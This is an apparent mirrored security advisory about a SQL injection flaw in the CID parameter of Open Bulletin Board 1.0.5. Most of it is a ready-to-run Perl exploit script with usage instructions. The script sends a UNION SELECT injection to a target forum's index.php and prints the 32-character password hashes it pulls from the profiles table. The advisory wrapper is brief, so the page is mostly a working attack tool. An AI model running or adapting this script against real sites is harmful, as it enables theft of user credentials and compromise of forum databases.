OpenBB CID SQL Injection (Exploit)Summary
OpenBB - "is a discussion bulletin board application written in PHP. Main features include full customization via styles/templates, instant messaging, private messaging, categories, member ranks, a cache template system, boolean searches, thread rating, poll-based threads, moderation, SWF/Flash signatures, BB codes, thread notifications, ICQ/AIM messaging, Avatars, member lists, private forums and more."
An SQL injection vulnerability exists in OpenBB's CID parameter, by exploiting this vulnerability a malicious attacker can endanger OpenBB's database integrity.
Credit:
The original article can be found at: http://rst.void.ru/download/r57openbb.txt
Details
Vulnerable Systems:
* Open Bulletin Board version 1.0.5
#!/usr/bin/perl -w
# OpenBB sql injection
# tested on Open Bulletin Board 1.0.5 with mysql
# (c)oded by x97Rang 2005 RST/GHC
# Gr33tz: __blf, 1dt.w0lf
use IO::Socket;
if (@ARGV != 3)
{
print "\nUsage: $0 [server] [path] [id]\n";
print "like $0 forum.mysite.com / 1\n";
print "If found nothing - forum NOT vulnerable\n\n";
exit ();
}
$server = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?CID=999+union+select+1,". "1,password,1,1,1,1,1,1,1,1,id,". "1+from+profiles+where+id=". "$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$id);
while(<$socket>)
{
if (/\>(\w{32})\</) { print "$1\n"; }
}
推荐
评论(0条)
